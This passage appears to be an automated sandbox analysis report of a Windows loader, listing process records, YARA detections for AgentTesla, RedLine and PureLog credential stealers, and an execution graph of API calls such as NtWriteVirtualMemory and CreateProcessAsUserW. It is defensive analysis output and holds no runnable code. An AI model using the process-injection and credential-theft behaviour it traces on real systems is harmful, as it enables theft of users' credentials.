                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:03:35:29
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:03:35:35
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:15.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:4%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:25
                                                                                              execution_graph 32527 31c1c6c 32528 31c1c7c 32527->32528 32529 31c1d04 32527->32529 32530 31c1c89 32528->32530 32531 31c1cc0 32528->32531 32532 31c1d0d 32529->32532 32533 31c1f58 32529->32533 32535 31c1c94 32530->32535 32575 31c1724 32530->32575 32534 31c1724 10 API calls 32531->32534 32540 31c1d25 32532->32540 32547 31c1e24 32532->32547 32536 31c1fec 32533->32536 32538 31c1f68 32533->32538 32544 31c1fac 32533->32544 32543 31c1cd7 32534->32543 32546 31c1724 10 API calls 32538->32546 32539 31c1d2c 32540->32539 32541 31c1d48 32540->32541 32549 31c1dfc 32540->32549 32556 31c1d79 Sleep 32541->32556 32567 31c1d9c 32541->32567 32542 31c1cfd 32543->32542 32562 31c1a8c 8 API calls 32543->32562 32545 31c1fb2 32544->32545 32550 31c1724 10 API calls 32544->32550 32563 31c1f82 32546->32563 32554 31c1e7c 32547->32554 32555 31c1e55 Sleep 32547->32555 32564 31c1e95 32547->32564 32548 31c1724 10 API calls 32560 31c1f2c 32548->32560 32552 31c1724 10 API calls 32549->32552 32566 31c1fc1 32550->32566 32551 31c1cb9 32569 31c1e05 32552->32569 32553 31c1fa7 32554->32548 32554->32564 32555->32554 32557 31c1e6f Sleep 32555->32557 32558 31c1d91 Sleep 32556->32558 32556->32567 32557->32547 32558->32541 32559 31c1ca1 32559->32551 32599 31c1a8c 32559->32599 32560->32564 32568 31c1a8c 8 API calls 32560->32568 32561 31c1e1d 32562->32542 32563->32553 32570 31c1a8c 8 API calls 32563->32570 32566->32553 32573 31c1a8c 8 API calls 32566->32573 32571 31c1f50 32568->32571 32569->32561 32572 31c1a8c 8 API calls 32569->32572 32570->32553 32572->32561 32574 31c1fe4 32573->32574 32576 31c173c 32575->32576 32577 31c1968 32575->32577 32586 31c17cb Sleep 32576->32586 32589 31c174e 32576->32589 32578 31c1a80 32577->32578 32579 31c1938 32577->32579 32580 31c1a89 32578->32580 32581 31c1684 VirtualAlloc 32578->32581 32585 31c1947 Sleep 32579->32585 32592 31c1986 32579->32592 32580->32559 32583 31c16bf 32581->32583 32584 31c16af 32581->32584 32582 31c175d 32582->32559 32583->32559 32616 31c1644 32584->32616 32590 31c195d Sleep 32585->32590 32585->32592 32586->32589 32591 31c17e4 Sleep 32586->32591 32588 31c182c 32598 31c1838 32588->32598 32622 31c15cc 32588->32622 32589->32582 32589->32588 32593 31c180a Sleep 32589->32593 32590->32579 32591->32576 32594 31c15cc VirtualAlloc 32592->32594 32597 31c19a4 32592->32597 32593->32588 32595 31c1820 Sleep 32593->32595 32594->32597 32595->32589 32597->32559 32598->32559 32600 31c1b6c 32599->32600 32601 31c1aa1 32599->32601 32602 31c1aa7 32600->32602 32604 31c16e8 32600->32604 32601->32602 32606 31c1b13 Sleep 32601->32606 32603 31c1ab0 32602->32603 32607 31c1b4b Sleep 32602->32607 32613 31c1b81 32602->32613 32603->32551 32605 31c1c66 32604->32605 32608 31c1644 2 API calls 32604->32608 32605->32551 32606->32602 32609 31c1b2d Sleep 32606->32609 32611 31c1b61 Sleep 32607->32611 32607->32613 32610 31c16f5 VirtualFree 32608->32610 32609->32601 32612 31c170d 32610->32612 32611->32602 32612->32551 32614 31c1c00 VirtualFree 32613->32614 32615 31c1ba4 32613->32615 32614->32551 32615->32551 32617 31c164d 32616->32617 32618 31c1681 32616->32618 32617->32618 32619 31c164f Sleep 32617->32619 32618->32583 32620 31c1664 32619->32620 32620->32618 32621 31c1668 Sleep 32620->32621 32621->32617 32626 31c1560 32622->32626 32624 31c15d4 VirtualAlloc 32625 31c15eb 32624->32625 32625->32598 32627 31c1500 32626->32627 32627->32624 32628 31c4edc 32629 31c4ee9 32628->32629 32633 31c4ef0 32628->32633 32634 31c4c38 32629->32634 32640 31c4c50 32633->32640 32635 31c4c4c 32634->32635 32636 31c4c3c SysAllocStringLen 32634->32636 32635->32633 32636->32635 32637 31c4c30 32636->32637 32638 31c4f3c 32637->32638 32639 31c4f26 SysAllocStringLen 32637->32639 32638->32633 32639->32637 32639->32638 32641 31c4c5c 32640->32641 32642 31c4c56 SysFreeString 32640->32642 32642->32641 32643 31ed2fc 32653 31c656c 32643->32653 32647 31ed32a 32658 31ec35c timeSetEvent 32647->32658 32649 31ed334 32650 31ed342 GetMessageA 32649->32650 32651 31ed336 TranslateMessage DispatchMessageA 32650->32651 32652 31ed352 32650->32652 32651->32650 32654 31c6577 32653->32654 32659 31c4198 32654->32659 32657 31c42ac SysFreeString SysReAllocStringLen SysAllocStringLen 32657->32647 32658->32649 32660 31c41de 32659->32660 32661 31c43e8 32660->32661 32662 31c4257 32660->32662 32664 31c4419 32661->32664 32668 31c442a 32661->32668 32673 31c4130 32662->32673 32678 31c435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32664->32678 32667 31c4423 32667->32668 32669 31c446f FreeLibrary 32668->32669 32670 31c4493 32668->32670 32669->32668 32671 31c449c 32670->32671 32672 31c44a2 ExitProcess 32670->32672 32671->32672 32674 31c4140 32673->32674 32675 31c4173 32673->32675 32674->32675 32676 31c15cc VirtualAlloc 32674->32676 32679 31c5868 32674->32679 32675->32657 32676->32674 32678->32667 32680 31c5878 GetModuleFileNameA 32679->32680 32681 31c5894 32679->32681 32683 31c5acc GetModuleFileNameA RegOpenKeyExA 32680->32683 32681->32674 32684 31c5b4f 32683->32684 32685 31c5b0f RegOpenKeyExA 32683->32685 32701 31c5908 12 API calls 32684->32701 32685->32684 32686 31c5b2d RegOpenKeyExA 32685->32686 32686->32684 32688 31c5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32686->32688 32690 31c5c0f 32688->32690 32691 31c5cf2 32688->32691 32689 31c5b74 RegQueryValueExA 32692 31c5b94 RegQueryValueExA 32689->32692 32693 31c5bb2 RegCloseKey 32689->32693 32690->32691 32694 31c5c1f lstrlenA 32690->32694 32691->32681 32692->32693 32693->32681 32696 31c5c37 32694->32696 32696->32691 32697 31c5c5c lstrcpynA LoadLibraryExA 32696->32697 32698 31c5c84 32696->32698 32697->32698 32698->32691 32699 31c5c8e lstrcpynA LoadLibraryExA 32698->32699 32699->32691 32700 31c5cc0 lstrcpynA LoadLibraryExA 32699->32700 32700->32691 32701->32689 32702 31e7074 33523 31c4860 32702->33523 33524 31c4871 33523->33524 33525 31c48ae 33524->33525 33526 31c4897 33524->33526 33541 31c45a0 33525->33541 33532 31c4bcc 33526->33532 33529 31c48df 33530 31c48a4 33530->33529 33546 31c4530 33530->33546 33533 31c4bd9 33532->33533 33540 31c4c09 33532->33540 33534 31c4c02 33533->33534 33536 31c4be5 33533->33536 33537 31c45a0 11 API calls 33534->33537 33552 31c2c44 11 API calls 33536->33552 33537->33540 33538 31c4bf3 33538->33530 33553 31c44dc 33540->33553 33542 31c45c8 33541->33542 33543 31c45a4 33541->33543 33542->33530 33566 31c2c10 33543->33566 33545 31c45b1 33545->33530 33547 31c4534 33546->33547 33548 31c4544 33546->33548 33547->33548 33550 31c45a0 11 API calls 33547->33550 33549 31c4572 33548->33549 33551 31c2c2c 11 API calls 33548->33551 33549->33529 33550->33548 33551->33549 33552->33538 33554 31c44e2 33553->33554 33556 31c44fd 33553->33556 33554->33556 33557 31c2c2c 33554->33557 33556->33538 33558 31c2c3a 33557->33558 33559 31c2c30 33557->33559 33558->33556 33559->33558 33560 31c2d19 33559->33560 33564 31c6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33559->33564 33565 31c2ce8 7 API calls 33560->33565 33563 31c2d3a 33563->33556 33564->33560 33565->33563 33567 31c2c27 33566->33567 33569 31c2c14 33566->33569 33567->33545 33568 31c2c1e 33568->33545 33569->33568 33570 31c2d19 33569->33570 33574 31c6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33569->33574 33575 31c2ce8 7 API calls 33570->33575 33573 31c2d3a 33573->33545 33574->33570 33575->33573 33576 31e3e12 33577 31c4860 11 API calls 33576->33577 33578 31e3e33 33577->33578 33579 31e3e4b 33578->33579 35121 31c47ec 33579->35121 33581 31e3e6a 33582 31e3e82 33581->33582 35136 31d89d0 33582->35136 33587 31c4860 11 API calls 33588 31e3ee0 33587->33588 33589 31e3eeb 33588->33589 33590 31e3ef7 33589->33590 33591 31c4860 11 API calls 33590->33591 33592 31e3f18 33591->33592 33593 31e3f23 33592->33593 33594 31e3f30 33593->33594 33595 31c47ec 11 API calls 33594->33595 33596 31e3f4f 33595->33596 33597 31e3f67 33596->33597 33598 31d89d0 20 API calls 33597->33598 33599 31e3f73 33598->33599 33600 31c4860 11 API calls 33599->33600 33601 31e3f94 33600->33601 33602 31e3f9f 33601->33602 33603 31e3fac 33602->33603 33604 31c47ec 11 API calls 33603->33604 33605 31e3fcb 33604->33605 33606 31e3fe3 33605->33606 33607 31d89d0 20 API calls 33606->33607 33608 31e3fef 33607->33608 33609 31c4860 11 API calls 33608->33609 33610 31e4010 33609->33610 33611 31e401b 33610->33611 33612 31e4028 33611->33612 33613 31c47ec 11 API calls 33612->33613 33614 31e4047 33613->33614 33615 31e4052 33614->33615 33616 31e405f 33615->33616 33617 31d89d0 20 API calls 33616->33617 33618 31e406b 33617->33618 35156 31de358 33618->35156 33621 31e4091 33622 31e40a2 33621->33622 35161 31ddc8c 33622->35161 33625 31c4860 11 API calls 33626 31e40f1 33625->33626 33627 31e40fc 33626->33627 33628 31c47ec 11 API calls 33627->33628 33629 31e4128 33628->33629 33630 31e4133 33629->33630 33631 31d89d0 20 API calls 33630->33631 33632 31e414c 33631->33632 33633 31c4860 11 API calls 33632->33633 33634 31e416d 33633->33634 33635 31c47ec 11 API calls 33634->33635 33636 31e41a4 33635->33636 33637 31e41af 33636->33637 33638 31d89d0 20 API calls 33637->33638 33639 31e41c8 33638->33639 35176 31d88b8 LoadLibraryW 33639->35176 33641 31e41cd 33642 31e41d7 33641->33642 35181 31de678 33642->35181 33645 31c4860 11 API calls 33646 31e4217 33645->33646 33647 31e422f 33646->33647 33648 31c47ec 11 API calls 33647->33648 33649 31e424e 33648->33649 33650 31e4259 33649->33650 33651 31d89d0 20 API calls 33650->33651 33652 31e4272 Sleep 33651->33652 33653 31c4860 11 API calls 33652->33653 33654 31e429d 33653->33654 33655 31e42b5 33654->33655 33656 31c47ec 11 API calls 33655->33656 33657 31e42d4 33656->33657 33658 31e42df 33657->33658 33659 31e42ec 33658->33659 33660 31d89d0 20 API calls 33659->33660 33661 31e42f8 33660->33661 33662 31c4860 11 API calls 33661->33662 33663 31e4319 33662->33663 35320 31c49a0 33663->35320 35122 31c47f0 35121->35122 35123 31c4851 35121->35123 35124 31c47f8 35122->35124 35125 31c4530 35122->35125 35124->35123 35127 31c4807 35124->35127 35128 31c4530 11 API calls 35124->35128 35130 31c45a0 11 API calls 35125->35130 35131 31c4544 35125->35131 35126 31c4572 35126->33581 35129 31c45a0 11 API calls 35127->35129 35128->35127 35133 31c4821 35129->35133 35130->35131 35131->35126 35132 31c2c2c 11 API calls 35131->35132 35132->35126 35134 31c4530 11 API calls 35133->35134 35135 31c484d 35134->35135 35135->33581 35137 31d89e4 35136->35137 35324 31d81cc 35137->35324 35139 31d8a1d 35335 31d8274 35139->35335 35141 31d8a36 35346 31d7d78 35141->35346 35143 31d8a95 35360 31d8338 35143->35360 35146 31d8abc 35372 31c4500 35146->35372 35149 31df094 35150 31df0b9 35149->35150 35151 31df0e5 35150->35151 35383 31c46c4 11 API calls 35150->35383 35384 31c4530 11 API calls 35150->35384 35153 31c44dc 11 API calls 35151->35153 35154 31df0fa 35153->35154 35154->33587 35157 31c4bcc 11 API calls 35156->35157 35158 31de370 35157->35158 35159 31de391 35158->35159 35385 31c49f8 35158->35385 35159->33621 35162 31ddca2 35161->35162 35391 31c4f20 35162->35391 35164 31ddcaa 35165 31ddcca RtlDosPathNameToNtPathName_U 35164->35165 35395 31ddbdc 35165->35395 35167 31ddce6 NtCreateFile 35168 31ddd11 35167->35168 35169 31c49f8 11 API calls 35168->35169 35170 31ddd23 NtWriteFile NtClose 35169->35170 35171 31ddd4d 35170->35171 35396 31c4c60 35171->35396 35174 31c44dc 11 API calls 35175 31ddd5d Sleep 35174->35175 35175->33625 35177 31d8274 15 API calls 35176->35177 35178 31d88f1 35177->35178 35179 31d7d78 18 API calls 35178->35179 35180 31d891f FreeLibrary 35179->35180 35180->33641 35182 31de681 35181->35182 35182->35182 35183 31c4860 11 API calls 35182->35183 35184 31de6ca 35183->35184 35185 31c47ec 11 API calls 35184->35185 35186 31de6ef 35185->35186 35187 31d89d0 20 API calls 35186->35187 35188 31de70a 35187->35188 35189 31c4860 11 API calls 35188->35189 35190 31de723 35189->35190 35191 31c47ec 11 API calls 35190->35191 35192 31de748 35191->35192 35193 31d89d0 20 API calls 35192->35193 35194 31de763 35193->35194 35195 31c4860 11 API calls 35194->35195 35196 31de77c 35195->35196 35197 31c47ec 11 API calls 35196->35197 35198 31de7a1 35197->35198 35199 31d89d0 20 API calls 35198->35199 35200 31de7bc 35199->35200 35201 31c4860 11 API calls 35200->35201 35202 31de7ee 35201->35202 35203 31d89d0 20 API calls 35202->35203 35204 31de838 35203->35204 35205 31c4860 11 API calls 35204->35205 35206 31de86f 35205->35206 35207 31c47ec 11 API calls 35206->35207 35208 31de894 35207->35208 35209 31d89d0 20 API calls 35208->35209 35210 31de8af 35209->35210 35211 31c4860 11 API calls 35210->35211 35212 31de8c8 35211->35212 35213 31c47ec 11 API calls 35212->35213 35214 31de8ed 35213->35214 35215 31d89d0 20 API calls 35214->35215 35216 31de908 35215->35216 35217 31c4860 11 API calls 35216->35217 35218 31de921 35217->35218 35219 31c47ec 11 API calls 35218->35219 35220 31de946 35219->35220 35221 31d89d0 20 API calls 35220->35221 35222 31de961 35221->35222 35399 31c7f2c 35222->35399 35224 31de985 35403 31d8788 35224->35403 35227 31c4860 11 API calls 35228 31dea0a 35227->35228 35229 31c47ec 11 API calls 35228->35229 35230 31dea3b 35229->35230 35231 31d89d0 20 API calls 35230->35231 35232 31dea5f 35231->35232 35233 31c4860 11 API calls 35232->35233 35234 31dea7b 35233->35234 35235 31c47ec 11 API calls 35234->35235 35236 31deaac 35235->35236 35237 31d89d0 20 API calls 35236->35237 35238 31dead0 35237->35238 35239 31c4860 11 API calls 35238->35239 35240 31deaec 35239->35240 35241 31c47ec 11 API calls 35240->35241 35242 31deb1d 35241->35242 35243 31d89d0 20 API calls 35242->35243 35244 31deb41 35243->35244 35245 31c4860 11 API calls 35244->35245 35246 31deb5d 35245->35246 35247 31c47ec 11 API calls 35246->35247 35248 31deb7b 35247->35248 35415 31d894c LoadLibraryW 35248->35415 35251 31c4860 11 API calls 35252 31debac 35251->35252 35253 31c47ec 11 API calls 35252->35253 35254 31debca 35253->35254 35255 31d894c 21 API calls 35254->35255 35256 31debdf 35255->35256 35257 31c4860 11 API calls 35256->35257 35258 31debfb 35257->35258 35259 31c47ec 11 API calls 35258->35259 35260 31dec19 35259->35260 35261 31d894c 21 API calls 35260->35261 35262 31dec2e 35261->35262 35263 31c4860 11 API calls 35262->35263 35264 31dec4a 35263->35264 35265 31c47ec 11 API calls 35264->35265 35266 31dec68 35265->35266 35267 31d894c 21 API calls 35266->35267 35268 31dec7d 35267->35268 35269 31dec87 35268->35269 35270 31deee2 35268->35270 35271 31c4860 11 API calls 35269->35271 35272 31c4500 11 API calls 35270->35272 35275 31deca3 35271->35275 35273 31deeff 35272->35273 35274 31c4c60 SysFreeString 35273->35274 35276 31def0a 35274->35276 35278 31c47ec 11 API calls 35275->35278 35277 31c4500 11 API calls 35276->35277 35279 31def1a 35277->35279 35284 31decd4 35278->35284 35280 31c4c60 SysFreeString 35279->35280 35281 31def22 35280->35281 35282 31c4500 11 API calls 35281->35282 35283 31def2f 35282->35283 35283->33645 35285 31d89d0 20 API calls 35284->35285 35286 31decf8 35285->35286 35287 31c4860 11 API calls 35286->35287 35288 31ded14 35287->35288 35289 31c47ec 11 API calls 35288->35289 35290 31ded45 35289->35290 35291 31d89d0 20 API calls 35290->35291 35292 31ded69 WaitForSingleObject CloseHandle CloseHandle 35291->35292 35293 31c4860 11 API calls 35292->35293 35294 31deda0 35293->35294 35295 31c47ec 11 API calls 35294->35295 35296 31dedbe 35295->35296 35297 31d894c 21 API calls 35296->35297 35298 31dedd3 35297->35298 35299 31c4860 11 API calls 35298->35299 35300 31dedef 35299->35300 35301 31c47ec 11 API calls 35300->35301 35302 31dee0d 35301->35302 35303 31d894c 21 API calls 35302->35303 35304 31dee22 35303->35304 35305 31c4860 11 API calls 35304->35305 35306 31dee3e 35305->35306 35307 31c47ec 11 API calls 35306->35307 35308 31dee5c 35307->35308 35309 31d894c 21 API calls 35308->35309 35310 31dee71 35309->35310 35311 31c4860 11 API calls 35310->35311 35312 31dee8d 35311->35312 35313 31c47ec 11 API calls 35312->35313 35314 31deeab 35313->35314 35315 31d894c 21 API calls 35314->35315 35316 31deec0 35315->35316 35317 31d894c 21 API calls 35316->35317 35318 31deed1 35317->35318 35319 31d894c 21 API calls 35318->35319 35319->35270 35321 31c49a4 35320->35321 35322 31c46d4 35321->35322 35323 31c46da 35322->35323 35325 31c4530 11 API calls 35324->35325 35326 31d81ef 35325->35326 35376 31d798c 35326->35376 35328 31d81fc 35329 31d8204 GetModuleHandleA 35328->35329 35330 31d8274 15 API calls 35329->35330 35331 31d8215 GetModuleHandleA 35330->35331 35332 31d8233 35331->35332 35333 31c44dc 11 API calls 35332->35333 35334 31d823b 35333->35334 35334->35139 35336 31c4530 11 API calls 35335->35336 35337 31d8299 35336->35337 35338 31d798c 12 API calls 35337->35338 35339 31d82a6 35338->35339 35340 31c47ec 11 API calls 35339->35340 35341 31d82b3 35340->35341 35342 31d82bb GetModuleHandleW GetProcAddress GetProcAddress 35341->35342 35343 31d82ee 35342->35343 35344 31c4500 11 API calls 35343->35344 35345 31d82fb 35344->35345 35345->35141 35347 31c4530 11 API calls 35346->35347 35348 31d7d9d 35347->35348 35349 31d798c 12 API calls 35348->35349 35350 31d7daa 35349->35350 35351 31c47ec 11 API calls 35350->35351 35352 31d7dba 35351->35352 35353 31d81cc 17 API calls 35352->35353 35354 31d7dcd 35353->35354 35355 31d8274 15 API calls 35354->35355 35356 31d7dd3 NtWriteVirtualMemory 35355->35356 35357 31d7dff 35356->35357 35358 31c4500 11 API calls 35357->35358 35359 31d7e0c 35358->35359 35359->35143 35361 31c4530 11 API calls 35360->35361 35362 31d835b 35361->35362 35363 31c4860 11 API calls 35362->35363 35364 31d837a 35363->35364 35365 31d81cc 17 API calls 35364->35365 35366 31d838d 35365->35366 35367 31d8274 15 API calls 35366->35367 35368 31d8393 FlushInstructionCache 35367->35368 35369 31d83b9 35368->35369 35370 31c44dc 11 API calls 35369->35370 35371 31d83c1 FreeLibrary 35370->35371 35371->35146 35374 31c4506 35372->35374 35373 31c452c 35373->35149 35374->35373 35375 31c2c2c 11 API calls 35374->35375 35375->35374 35377 31d799d 35376->35377 35378 31c4bcc 11 API calls 35377->35378 35381 31d79ad 35378->35381 35379 31d7a19 35379->35328 35381->35379 35382 31cbabc CharNextA 35381->35382 35382->35381 35383->35150 35384->35150 35386 31c49ac 35385->35386 35387 31c49e7 35386->35387 35388 31c45a0 11 API calls 35386->35388 35387->35158 35389 31c49c3 35388->35389 35389->35387 35390 31c2c2c 11 API calls 35389->35390 35390->35387 35392 31c4f3c 35391->35392 35393 31c4f26 SysAllocStringLen 35391->35393 35392->35164 35393->35392 35394 31c4c30 35393->35394 35394->35391 35395->35167 35397 31c4c74 35396->35397 35398 31c4c66 SysFreeString 35396->35398 35397->35174 35398->35397 35400 31c7f3f 35399->35400 35422 31c4a00 35400->35422 35404 31c4530 11 API calls 35403->35404 35405 31d87ab 35404->35405 35406 31c4860 11 API calls 35405->35406 35407 31d87ca 35406->35407 35408 31d81cc 17 API calls 35407->35408 35409 31d87dd 35408->35409 35410 31d8274 15 API calls 35409->35410 35411 31d87e3 CreateProcessAsUserW 35410->35411 35412 31d8827 35411->35412 35413 31c44dc 11 API calls 35412->35413 35414 31d882f 35413->35414 35414->35227 35416 31d89bb 35415->35416 35417 31d8973 GetProcAddress 35415->35417 35416->35251 35418 31d898d 35417->35418 35419 31d89b0 FreeLibrary 35417->35419 35420 31d7d78 18 API calls 35418->35420 35419->35416 35421 31d89a5 35420->35421 35421->35419 35423 31c4a05 35422->35423 35424 31c4a32 35422->35424 35423->35424 35427 31c4a19 35423->35427 35425 31c44dc 11 API calls 35424->35425 35426 31c4a28 35425->35426 35426->35224 35429 31c45cc 35427->35429 35430 31c45a0 11 API calls 35429->35430 35431 31c45dc 35430->35431 35432 31c44dc 11 API calls 35431->35432 35433 31c45f4 35432->35433 35433->35426 35434 31ec350 35437 31df7c8 35434->35437 35436 31ec358 35438 31df7d0 35437->35438 35438->35438 35439 31df7d7 35438->35439 35440 31d88b8 20 API calls 35439->35440 35441 31df7f1 35440->35441 37820 31c2ee0 QueryPerformanceCounter 35441->37820 35443 31df7f6 35444 31df800 InetIsOffline 35443->35444 35445 31df81b 35444->35445 35446 31df80a 35444->35446 35447 31c4530 11 API calls 35445->35447 35448 31c4530 11 API calls 35446->35448 35449 31df819 35447->35449 35448->35449 35450 31c4860 11 API calls 35449->35450 35451 31df848 35450->35451 35452 31df850 35451->35452 35453 31df85a 35452->35453 35454 31c47ec 11 API calls 35453->35454 35455 31df873 35454->35455 35456 31df87b 35455->35456 35457 31df885 35456->35457 35458 31d89d0 20 API calls 35457->35458 35459 31df88e 35458->35459 35460 31c4860 11 API calls 35459->35460 35461 31df8ac 35460->35461 35462 31df8b4 35461->35462 35463 31c46d4 35462->35463 35464 31df8be 35463->35464 35465 31c47ec 11 API calls 35464->35465 35466 31df8d7 35465->35466 35467 31df8e9 35466->35467 35468 31d89d0 20 API calls 35467->35468 35469 31df8f2 35468->35469 35470 31c4860 11 API calls 35469->35470 35471 31df910 35470->35471 35472 31df918 35471->35472 35473 31df922 35472->35473 35474 31c47ec 11 API calls 35473->35474 35475 31df93b 35474->35475 35476 31df94d 35475->35476 35477 31d89d0 20 API calls 35476->35477 35478 31df956 35477->35478 35479 31c4860 11 API calls 35478->35479 35480 31df974 35479->35480 35481 31df986 35480->35481 35482 31c47ec 11 API calls 35481->35482 35483 31df99f 35482->35483 35484 31df9b1 35483->35484 35485 31d89d0 20 API calls 35484->35485 35486 31df9ba 35485->35486 35487 31c4860 11 API calls 35486->35487 35488 31df9d8 35487->35488 35489 31df9ea 35488->35489 35490 31c47ec 11 API calls 35489->35490 35491 31dfa03 35490->35491 35492 31d89d0 20 API calls 35491->35492 35493 31dfa1e 35492->35493 35494 31c4860 11 API calls 35493->35494 35495 31dfa3c 35494->35495 35496 31dfa4e 35495->35496 35497 31c47ec 11 API calls 35496->35497 35498 31dfa67 35497->35498 35499 31dfa79 35498->35499 35500 31d89d0 20 API calls 35499->35500 35501 31dfa82 35500->35501 35502 31c4860 11 API calls 35501->35502 35503 31dfaa0 35502->35503 35504 31dfaa8 35503->35504 35505 31dfab2 35504->35505 35506 31c47ec 11 API calls 35505->35506 35507 31dfacb 35506->35507 35508 31dfad3 35507->35508 35509 31dfadd 35508->35509 35510 31d89d0 20 API calls 35509->35510 35511 31dfae6 35510->35511 37823 31df6e8 GetModuleHandleW 35511->37823 35513 31dfaeb 35514 31eb2ff 35513->35514 